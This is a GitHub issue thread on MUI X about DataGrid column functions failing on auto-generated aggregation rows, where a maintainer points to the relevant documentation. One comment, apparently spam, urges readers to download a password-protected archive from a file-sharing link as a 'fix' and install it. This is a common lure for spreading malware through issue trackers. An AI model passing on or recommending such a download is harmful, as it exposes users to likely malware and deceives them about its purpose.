### ISSUE TITLE
How to handle auto-generated rows?

### ISSUE THREAD

**Issue by shoxter** [mui/mui-x#14358]
### The problem in depth

Hi MUI Support,

I'm encountering issues when using `valueGetter`, `valueFormatter`, and `renderCell` functions in a DataGrid where some rows are auto-generated (e.g., aggregation rows). For example, calling `row.product.humanId` within these functions works fine for normal rows, but breaks when the row is auto-generated, as those fields may not exist.

Is there a recommended approach to handle these errors without needing to add extensive checks in all column definitions to distinguish between auto-generated and normal rows?

Thanks for your help!

### Your environment

<details>
  <summary>`npx @mui/envinfo`</summary>

```
  Don't forget to mention which browser you used.
  Output from `npx @mui/envinfo` goes here.
```
</details>

**Search keywords**: Auto-generated rows
**Order ID**: 96266

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by romgrk** [comment]
You can find the recommendation in the docs: https://mui.com/x/react-data-grid/column-definition/#autogenerated-rows

There is no way to avoid the checks, otherwise those cells wouldn't be configurable.

**Comment by shoxter** [comment]
I didn't know how I couldn't find that. Thank you for your help.
